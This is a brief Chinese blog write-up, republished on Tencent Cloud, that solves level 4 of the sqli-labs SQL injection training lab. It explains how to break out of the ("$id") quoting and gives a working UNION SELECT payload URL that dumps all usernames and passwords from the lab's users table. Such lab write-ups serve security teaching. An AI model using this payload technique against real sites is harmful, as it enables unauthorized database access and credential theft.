【less-4】sqli-labs靶场第四关
【less-4】sqli-labs靶场第四关
未名编程
发布于 2024-10-12 11:41:08
发布于 2024-10-12 11:41:08
代码可运行
运行总次数:0
代码可运行
网址
https://sqli.wmcoder.site/sqli-labs/Less-4/
解法
与Less-2类似,直接看这篇文章:【less-2】sqli-labs靶场第二关
不同的是,根据错误回显知道,其拼接方式为id=("$id")
故采用https://sqli.wmcoder.site/sqli-labs/Less-2/?id=1")
采用如下语句获取所有用户名和密码
https://sqli.wmcoder.site/sqli-labs/Less-4/?id=1") and 1=2 union select 1,group_concat(username), group_concat(password) from security.users --+
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-10-12,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
